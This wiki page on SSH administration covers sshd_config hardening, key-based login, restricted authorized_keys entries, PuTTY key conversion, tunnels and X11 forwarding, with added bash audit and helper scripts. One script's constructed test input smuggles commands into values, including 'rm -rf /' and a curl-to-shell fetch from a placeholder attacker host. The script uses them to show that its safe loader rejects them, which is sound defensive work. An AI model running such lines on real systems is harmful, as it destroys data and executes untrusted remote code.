
SSH

SSHD

Service config:

/etc/ssh/sshd_config
UseDNS no  #Add this to /etc/ssh/sshd_config to skip the reverse DNS lookup of every connecting client (logins hang for a long time when DNS is broken)

To deny password authentication (this applies to all users, root included) and allow key authentication only, set the following options:

PasswordAuthentication no
PubkeyAuthentication yes
RSAAuthentication yes                   #Only relevant for the obsolete SSH protocol 1; OpenSSH 7.4 and later ignore it ("Deprecated option"), so it can be dropped

To deny root login:

PermitRootLogin no

To allow root login only from particular IPs:

PermitRootLogin yes
AllowUsers root@10.6.3.100 root@10.6.3.101 root@10.6.3.102

Caveat: as soon as AllowUsers is set, only the listed users may log in at all, so every other account has to be added to the same line (e.g. "AllowUsers tmade root@10.6.3.100 ..."), otherwise they are locked out. "PermitRootLogin prohibit-password" instead of "yes" keeps root key-only even if password authentication is switched on again later.

To deny (additionally) keyboard-interactive password prompts via PAM, which "PasswordAuthentication no" alone does not switch off:

ChallengeResponseAuthentication no      #Named KbdInteractiveAuthentication since OpenSSH 8.7; the old name still works as an alias
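The following script is an added example for this page (not part of the original wiki): it audits an sshd_config for the settings discussed above the way sshd itself reads the file, so that the usual mistake of "fixing" a setting by appending a second line at the bottom is caught. The two sample config files it writes are constructed for the demo and do not come from any real server.

```shell
#!/usr/bin/env bash
# Added example, not original wiki content: audit an sshd_config for the
# settings discussed above. It mimics how sshd reads the file: keywords are
# case-insensitive, "Keyword value" and "Keyword=value" are both allowed, and
# the FIRST value obtained for a keyword wins, so a later "PermitRootLogin no"
# does not undo an earlier "PermitRootLogin yes". Everything after the first
# "Match" line is conditional and is not checked here.

lc() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

# effective_value FILE KEYWORD -> first value set for KEYWORD in the global
# section, or "" if unset (sshd then uses its compiled-in default)
effective_value() {
    awk -v key="$(lc "$2")" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }       # comment or blank line
        {
            line = $0; sub(/^[[:space:]]+/, "", line)
            kw = line; sub(/[[:space:]=].*$/, "", kw); kw = tolower(kw)
            if (kw == "match") exit                        # conditional blocks start here
            if (kw == key) {
                sub(/^[^[:space:]=]+[[:space:]=]+/, "", line)   # drop the keyword
                print line; exit                           # first occurrence wins
            }
        }' "$1"
}

# check_sshd_config FILE -> prints one finding per line (no output = OK)
check_sshd_config() {
    local f=$1 v cr kbd
    v=$(lc "$(effective_value "$f" PermitRootLogin)")
    [ "$v" = yes ] && echo "PermitRootLogin yes: use 'no', or 'prohibit-password' plus AllowUsers root@IP for the hosts that need it"
    v=$(lc "$(effective_value "$f" PasswordAuthentication)")
    [ "${v:-yes}" = yes ] && echo "PasswordAuthentication ${v:-unset (default yes)}: set it to 'no'"
    v=$(lc "$(effective_value "$f" PubkeyAuthentication)")
    [ "$v" = no ] && echo "PubkeyAuthentication no: key logins are disabled"
    cr=$(lc "$(effective_value "$f" ChallengeResponseAuthentication)")
    kbd=$(lc "$(effective_value "$f" KbdInteractiveAuthentication)")
    if [ "$cr" != no ] && [ "$kbd" != no ]; then
        echo "ChallengeResponseAuthentication/KbdInteractiveAuthentication not 'no': PAM password prompts stay possible"
    fi
    return 0
}

# count_findings FILE -> number of findings
count_findings() { check_sshd_config "$1" | grep -c .; }

# write_sample_configs DIR -> two constructed sshd_config files (not from a real host)
write_sample_configs() {
    cat > "$1/weak_sshd_config" <<'EOF'
# constructed sample: how many default installs look
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication yes
# this later line is ignored by sshd, the first value above wins
PermitRootLogin no
EOF
    cat > "$1/hardened_sshd_config" <<'EOF'
# constructed sample: the settings recommended above
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication=no
UseDNS no
# everything below applies only to the matched user and is not audited
Match User backup
    PasswordAuthentication yes
EOF
}

# demo: audit both samples
tmp=$(mktemp -d); write_sample_configs "$tmp"
for c in weak hardened; do
    echo "== $c"; check_sshd_config "$tmp/${c}_sshd_config"
done
rm -rf "$tmp"
```

On a real server run `check_sshd_config /etc/ssh/sshd_config` before restarting sshd; `sshd -T` (see the end of this page) prints what sshd actually resolved and is the authoritative check.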

Login

ssh -XC 172.22.49.120              #Login with X11 forwarding (-X) and compression (-C)
ssh -XCl stream 172.22.49.113      #Same, as user "stream" (-l): run X programs from the X terminal
ssh -l root suse10
ssh root@suse10                    #root = user, suse10 = host (or IP address)

SSH KEY-Authentication

Howto:

Generate the key pair (stored in ~/.ssh/) on the machine you log in FROM (server_A in the following); the private key never leaves it:

ssh-keygen -t rsa -b 4096                                                   #Generate an "rsa" key pair. Note: "dsa" keys also exist but are disabled by default since OpenSSH 7.0; "ed25519" (-t ed25519) is the modern choice

Created files:

id_rsa                                                                      #Private key, keep it secret (mode 0600). File location "/home/username/.ssh" or "/root/.ssh"

and

id_rsa.pub                                                                  #Public key, this is what goes to the remote host. File location "/home/username/.ssh" or "/root/.ssh"

To append id_rsa.pub to the remote user's authorized_keys ("/home/user/.ssh/authorized_keys") on remoteHost:

ssh-copy-id -i ~/.ssh/id_rsa.pub user@remoteHost

Note: "/home/user/.ssh/authorized_keys" (and ~/.ssh) will be created if missing; this step still needs a working login (e.g. the password) to remoteHost.


The same as single manual steps, copying authorized_keys from server_A to remoteHost (server_B):

Create a new file called

authorized_keys                                                             #Holds the public key(s) allowed to log in. File location "/home/username/.ssh" or "/root/.ssh"

Copy the content of id_rsa.pub into authorized_keys (or append) with:

cat id_rsa.pub >> authorized_keys

Copy authorized_keys to server_B

scp authorized_keys root@IP:

On server_B copy content of authorized_keys (from server_A) to ~/.ssh

cat authorized_keys > ~/.ssh/authorized_keys

or

cat authorized_keys >> ~/.ssh/authorized_keys

Access server_B from server_A via SSH (no password prompt any more, only the key passphrase if one was set):

ssh server_B

or

ssh IP(server_B)

Or all of the above in one step:

ssh-copy-id -i ~/.ssh/id_rsa.pub user@remoteHost
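The manual steps above as one function, added here as an example (not code from the original page). Two things the plain "cat ... >> ~/.ssh/authorized_keys" does not take care of: the key gets appended again on every run, and sshd (StrictModes, on by default) silently refuses the key if ~/.ssh or authorized_keys are group- or world-accessible. The sample key line is constructed and is not a real key; HOME_DIR is assumed to be the target user's home directory on server_B.

```shell
#!/usr/bin/env bash
# Added example, not original wiki content: the manual key-installation steps
# as one idempotent function. Skips a key that is already present and sets the
# permissions sshd's StrictModes insists on: ~/.ssh 0700, authorized_keys 0600.
# Assumption: HOME_DIR is the target user's home; run as that user (or as root
# and chown afterwards). The home directory itself must not be group-writable.

# install_pubkey PUBKEY_FILE HOME_DIR -> prints "added" or "present"
install_pubkey() {
    local pub=$1 home=$2 ak="$2/.ssh/authorized_keys" type blob comment oldmask
    # a .pub file is one line: TYPE BASE64BLOB [COMMENT]; the blob identifies the key
    read -r type blob comment < "$pub" || [ -n "$blob" ] || return 1
    case $type in
        ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp*|sk-ssh-ed25519@openssh.com|sk-ecdsa-sha2-*) ;;
        *) echo "not an OpenSSH public key line: $pub" >&2; return 1 ;;
    esac
    oldmask=$(umask); umask 077              # new dirs 0700, new files 0600
    mkdir -p "$home/.ssh" && chmod 700 "$home/.ssh"
    [ -e "$ak" ] || : > "$ak"
    chmod 600 "$ak"
    umask "$oldmask"
    if grep -qF -- "$blob" "$ak"; then       # same blob = same key, whatever the comment
        echo present
    else
        printf '%s %s%s\n' "$type" "$blob" "${comment:+ $comment}" >> "$ak"
        echo added
    fi
}

# perms_ok HOME_DIR -> true if ~/.ssh is exactly 0700 and authorized_keys 0600
perms_ok() {
    [ -n "$(find "$1/.ssh" -prune -perm 0700)" ] &&
    [ -n "$(find "$1/.ssh/authorized_keys" -prune -perm 0600)" ]
}

# write_sample_pubkey FILE -> constructed key line (placeholder blob, not a real key)
write_sample_pubkey() {
    echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedPlaceholderNotARealKey00000000000 tmade@server_A' > "$1"
}

# demo on a throwaway home directory
demo_home=$(mktemp -d)
write_sample_pubkey "$demo_home/id_ed25519.pub"
install_pubkey "$demo_home/id_ed25519.pub" "$demo_home"    # added
install_pubkey "$demo_home/id_ed25519.pub" "$demo_home"    # present
perms_ok "$demo_home" && echo "permissions ok"
rm -rf "$demo_home"
```

For a real host: copy id_rsa.pub over with scp as shown above, then run `install_pubkey /path/to/id_rsa.pub ~` on server_B.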

Regenerate the public key from the private key (if id_rsa.pub was lost):

ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub

"authorized_keys"

To limit a key to logins from one host and to take forwarding and the interactive shell away from it, prefix its line in the "authorized_keys" file with the following options:

from="testhost.domain.local",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty

Note: a hostname in "from=" only matches if sshd resolves the client's address (reverse DNS); with "UseDNS no" as set above, use IP addresses or CIDR ranges (e.g. from="10.6.3.0/24") instead. "command=" additionally pins the key to a single command.

Example entry (the options, followed by the public key; the private key never appears here):

from="testhost.domain.local",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyPW9iLLvMA4sfiDLDst6cLbrxQiw0xjFV+uZA+pnulcxotbyNzRDhi3PMjXce7V6WQSJ6izYFCN8Xv0w5HIju8BpPBob9d9VyU2wdFx+nCX3xFzlcquVUTR8WqzikbipLJF52nPLuemH5xBTZXgagnpX9ESZFhhYXol+MQuPC8+HW5xtCCN3+8D4K8GJiauL/0Uq0N9SfXK/0G8wBb28499F483ZnSm31DTTJq13iyiphtfwjqncW+H2mJKGoum8HoeQHx8ArfCtwelTKrXc7E/94ZFO/z7b0jPNXFH4jCZmq2/fjgwnO/nVPvfNbis4wxSomuihU7fA0ywxBferx root@testhost
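An added example, not part of the original page: an audit of an authorized_keys file that lists every key and which of the restrictions above it is missing. The parser follows the authorized_keys format (optional options field ending at the first unquoted whitespace, then type, key, comment), so option strings with spaces such as command="rsync --server ..." are handled; "restrict" (OpenSSH 7.2 and later) is accepted as covering all the no-* options. The sample file is constructed and its key blobs are placeholders.

```shell
#!/usr/bin/env bash
# Added example, not original wiki content: report authorized_keys entries
# that lack the from= / no-* restrictions shown above. Backslash-escaped quotes
# inside the options field are not handled.

# split_ak_line LINE -> sets AK_OPTS AK_TYPE AK_BLOB AK_COMMENT
split_ak_line() {
    local line=$1 i c inq=0
    AK_OPTS=""
    case $line in
        ssh-*|ecdsa-sha2-*|sk-*) ;;                  # starts with a key type: no options
        *)                                           # options end at first unquoted whitespace
            for ((i = 0; i < ${#line}; i++)); do
                c=${line:i:1}
                [ "$c" = '"' ] && inq=$((1 - inq))
                if [ "$inq" -eq 0 ] && { [ "$c" = ' ' ] || [ "$c" = $'\t' ]; }; then break; fi
            done
            AK_OPTS=${line:0:i}
            line=${line:i}
            line=${line#"${line%%[![:space:]]*}"}    # strip the leading whitespace
            ;;
    esac
    read -r AK_TYPE AK_BLOB AK_COMMENT <<<"$line"
}

# ak_missing OPTIONS -> space-separated list of the restrictions not present
ak_missing() {
    local o=",$1," missing="" opt
    case $o in *,from=*) ;; *) missing="$missing from=" ;; esac
    case $o in
        *,restrict,*) ;;                             # restrict implies all no-* options
        *) for opt in no-port-forwarding no-X11-forwarding no-agent-forwarding no-pty; do
               case $o in *,$opt,*) ;; *) missing="$missing $opt" ;; esac
           done ;;
    esac
    printf '%s' "${missing# }"
}

# ak_audit FILE -> one line per key: TYPE COMMENT STATUS
ak_audit() {
    local line status
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in ''|'#'*) continue ;; esac
        split_ak_line "$line"
        status=$(ak_missing "$AK_OPTS")
        printf '%-12s %-16s %s\n' "$AK_TYPE" "${AK_COMMENT:-(no comment)}" \
            "${status:+UNRESTRICTED, missing: $status}${status:-restricted}"
    done < "$1"
}

# ak_count_unrestricted FILE -> number of keys missing at least one restriction
ak_count_unrestricted() { ak_audit "$1" | grep -c UNRESTRICTED; }

# write_sample_ak FILE -> constructed sample (placeholder blobs, not real keys)
write_sample_ak() {
    cat > "$1" <<'EOF'
# constructed sample file
from="testhost.domain.local",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPLACEHOLDER1 root@testhost
restrict,from="10.6.3.100,10.6.3.101",command="/usr/bin/rsync --server --sender . /srv/backup" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER2 backup@nas
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER3 admin@laptop
EOF
}

# demo
demo=$(mktemp); write_sample_ak "$demo"; ak_audit "$demo"; rm -f "$demo"
```

Run `ak_audit ~/.ssh/authorized_keys` (or /root/.ssh/authorized_keys) on a server; every line reported as UNRESTRICTED is a key that can open a full shell with forwarding from anywhere its private half ends up.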

SSH Authentication from Windows -> Linux

Create the key files on the Windows client with PuTTY: start "puttygen.exe" and generate the key.

Save the private key (.ppk) and the public key to a folder.

Append the public key in OpenSSH one-line format to:

/home/user/.ssh/authorized_keys                                             #(via samba e.g.)

Note: the file puttygen's "Save public key" writes is in the multi-line SSH2 (RFC 4716) format ("---- BEGIN SSH2 PUBLIC KEY ----"), which sshd does not accept in authorized_keys. Paste the one-line text from the "Public key for pasting into OpenSSH authorized_keys file" box instead, or convert the saved file on the Linux side with "ssh-keygen -i -f file.pub".
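An added example, not from the original page: the conversion "ssh-keygen -i" does, written out in shell to show what the two formats are. The SSH2 file carries the same base64 key blob as the OpenSSH line, just wrapped in header/footer lines and folded; the key type that the OpenSSH line needs in front of the blob is the first length-prefixed string inside the blob itself. The sample file is constructed (an ed25519 blob whose key bytes are all 0x41, not a real key) and written the way puttygen would, with CRLF line ends.

```shell
#!/usr/bin/env bash
# Added example, not original wiki content: convert the multi-line SSH2
# (RFC 4716) public key file that puttygen saves into the one-line OpenSSH
# form needed in authorized_keys. Header continuation lines (a trailing
# backslash) are not handled.

# rfc4716_to_openssh FILE -> prints "TYPE BLOB [COMMENT]"
rfc4716_to_openssh() {
    local line blob="" comment="" inbody=0 len type
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%$'\r'}                               # puttygen writes CRLF
        case $line in
            '---- BEGIN SSH2 PUBLIC KEY ----') inbody=1; continue ;;
            '---- END SSH2 PUBLIC KEY ----')   break ;;
        esac
        [ "$inbody" -eq 1 ] || continue
        case $line in
            Comment:*)  comment=${line#Comment:}; comment=${comment# }
                        comment=${comment#\"}; comment=${comment%\"} ;;   # puttygen quotes it
            *:*)        ;;                               # other header (Subject: ...), ignored
            *)          blob=$blob$line ;;               # base64 body, lines joined
        esac
    done < "$1"
    [ -n "$blob" ] || { echo "$1: no key body found" >&2; return 1; }
    # wire format of the blob: uint32 big-endian length, then the key type string
    len=$(printf '%s' "$blob" | base64 -d | head -c 4 | od -An -tu1 |
          awk '{ print $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 }')
    [ "${len:-0}" -gt 0 ] && [ "$len" -le 64 ] || { echo "$1: not an SSH public key blob" >&2; return 1; }
    type=$(printf '%s' "$blob" | base64 -d | tail -c +5 | head -c "$len")
    printf '%s %s%s\n' "$type" "$blob" "${comment:+ $comment}"
}

# sample_blob -> base64 of a constructed ed25519 public key: the length-prefixed
# string "ssh-ed25519" followed by 32 bytes of 0x41 (not a real key)
sample_blob() {
    { printf '\000\000\000\013ssh-ed25519\000\000\000\040'; head -c 32 /dev/zero | tr '\0' 'A'; } |
        base64 | tr -d '\n'
}

# write_sample_rfc4716 FILE -> what puttygen would have saved (CRLF, folded at 64)
write_sample_rfc4716() {
    {
        echo '---- BEGIN SSH2 PUBLIC KEY ----'
        echo 'Comment: "constructed-test-key"'
        sample_blob | fold -w 64
        echo
        echo '---- END SSH2 PUBLIC KEY ----'
    } | awk '{ printf "%s\r\n", $0 }' > "$1"
}

# demo
demo=$(mktemp); write_sample_rfc4716 "$demo"; rfc4716_to_openssh "$demo"; rm -f "$demo"
```

Usage on a real file: `rfc4716_to_openssh putty-key.pub >> ~/.ssh/authorized_keys`; compare the result with what "ssh-keygen -i -f putty-key.pub" prints, the blobs must be identical.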

Note: changes to sshd_config only take effect after sshd has been restarted or reloaded (changes to authorized_keys need no restart):

/etc/init.d/sshd restart
rcsshd restart
service sshd restart

or the equivalent of your distribution (systemd: systemctl). Run "sshd -t" first (see the end of this page); a restart with a broken config locks you out.

ssh remote

Source a file from a remote machine into the local shell (the output of the ssh command is read via process substitution):

# ----------------------------------------------------------
# Machine 1
# ----------------------------------------------------------

$ cat free_hosts
IP=testtesttest

# ----------------------------------------------------------
# Machine 2
# ----------------------------------------------------------

$ . <(ssh machine1 cat free_hosts); echo "$IP"
testtesttest
$ . <(ssh 192.168.64.131 cat /root/somefile); echo "$IP"

Caveat: "." executes whatever the remote side returns as shell code in the local shell, with the local user's rights; a tampered or mistyped remote file runs locally. Only do this with files on hosts you control.
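An added example for the caveat above, not code from the original page: a loader that reads the same NAME=VALUE lines from the remote file but only assigns values matching a strict whitelist and never hands the content to "." or eval. The stand-in for "ssh machine1 cat free_hosts" is a constructed file whose first line is the wiki's example and whose other lines are what a tampered file could carry; the variable names KV_ACCEPTED/KV_REJECTED are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not original wiki content: safer replacement for
# ". <(ssh host cat file)". Only NAME=VALUE lines with a plain identifier on the
# left and plain characters on the right are assigned; variables that change
# shell behaviour are refused; everything else is reported and ignored.

# load_kv_safe < INPUT -> assigns accepted variables in the calling shell and
# sets KV_ACCEPTED / KV_REJECTED to the line counts
load_kv_safe() {
    local line name value
    # no quotes, spaces, ; & | $ ` ( ) or other shell metacharacters in the value
    local re='^([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9._:/@+,-]*)$'
    KV_ACCEPTED=0 KV_REJECTED=0
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%$'\r'}                               # tolerate CRLF
        case $line in ''|'#'*) continue ;; esac          # blank lines and comments
        if [[ $line =~ $re ]]; then
            name=${BASH_REMATCH[1]} value=${BASH_REMATCH[2]}
            case $name in
                PATH|IFS|HOME|SHELL|PS1|PS4|PROMPT_COMMAND|LD_*|BASH_*|KV_*)
                    echo "refused: $name is not a data variable" >&2
                    KV_REJECTED=$((KV_REJECTED + 1)); continue ;;
            esac
            printf -v "$name" '%s' "$value"               # assignment without eval
            KV_ACCEPTED=$((KV_ACCEPTED + 1))
        else
            echo "rejected: $line" >&2
            KV_REJECTED=$((KV_REJECTED + 1))
        fi
    done
}

# constructed stand-in for "ssh machine1 cat free_hosts": the first line is the
# wiki's example, the others are what a tampered file could contain
sample_remote_file() {
    cat <<'EOF'
IP=testtesttest
GW=10.0.0.1; rm -rf /
PATH=/tmp/evil
NAME=$(curl http://attacker.invalid/x|sh)
EOF
}

load_kv_safe < <(sample_remote_file)
echo "IP=$IP accepted=$KV_ACCEPTED rejected=$KV_REJECTED"
# real use, in place of the "." line above:
#   load_kv_safe < <(ssh machine1 cat free_hosts); echo "$IP"
```

The function must be fed with process substitution (or a redirect), not with a pipe: in bash a piped function runs in a subshell and its variables would be lost.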

ssh + script/ command

ssh user@IP sudo /scripts/linux_modify.sh   #Execute "/scripts/linux_modify.sh" on the remote machine as root via sudo (add -t if sudo asks for a password: it needs a tty)
ssh user@IP /scripts/linux_modify.sh        #Execute "/scripts/linux_modify.sh" on the remote machine as "user"
ssh user@IP "sudo uname -a"                 #Execute the command "uname -a" on the remote machine as root via sudo
ssh user@IP "uname -a"                      #Execute the command "uname -a" on the remote machine as "user"

ssh-agent

eval "$(ssh-agent -s)"                      #Start the agent: "ssh-agent -s" only prints the SSH_AUTH_SOCK/SSH_AGENT_PID settings, eval puts them into the current shell
ssh-add ~/.ssh/id_rsa                       #Add the key (passphrase will be prompted)

Script:

#!/bin/bash
eval "$(ssh-agent -s)" && ssh-add ~/.ssh/id_rsa

Note: executed as "./script" the agent is only known to the script's own shell; source it (". script") so the variables land in the interactive shell. Stop the agent with "ssh-agent -k" when done.

ssh Tunnel

ssh -L 4242:suse10.site:110 tmade@suse10.site		#user tmade forwards connections arriving on port 4242 of his local host to port 110 (POP3) on suse10.site through the ssh tunnel (local port forwarding); the destination "suse10.site:110" is resolved and connected from the ssh server, so it may also be a host only reachable from there

ssh over Proxy

ssh -o ProxyCommand="nc -X connect -x proxy_host_or_IP:port %h %p" username@hostname
ssh -o Port=2022 -o ProxyCommand="nc -X connect -x proxy_host_or_IP:port %h %p" username@hostname               #with ssh port 2022 (same as -p 2022)

Hint: "nc -X connect" (HTTP CONNECT through the proxy) is the OpenBSD netcat; the package "netcat-openbsd" which contains the program "nc" has to be installed. The traditional/GNU netcat does not know -X.

X11

To run an X11 program as root when root login is not allowed (and "sudo su -" would lose the forwarded display), hand the X authority cookie of your own ssh session to root:

  • Start the external X server on the client (such as Xming) and log in with your normal user via ssh -X (don't execute "sudo su -" during login); the display number ssh assigned is in the DISPLAY variable, :10 in the following
  • xauth -f ~/.Xauthority extract /tmp/Xauthtmp :10
  • sudo su -
  • xauth merge /tmp/Xauthtmp
  • export DISPLAY=localhost:10.0
  • xclock (or another X program)

/tmp/Xauthtmp contains the cookie that grants access to your display; delete it afterwards.

Check ssh-config

sshd -t                       #Check the configuration file for syntax errors (run it before every restart, a broken config locks you out)
sshd -T                       #Print the effective configuration after parsing, all directives with their resolved values (run as root, it reads the host keys)
linux/ssh.txt · Last modified: 2021/10/18 09:04 by tmade
 
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Noncommercial-Share Alike 4.0 International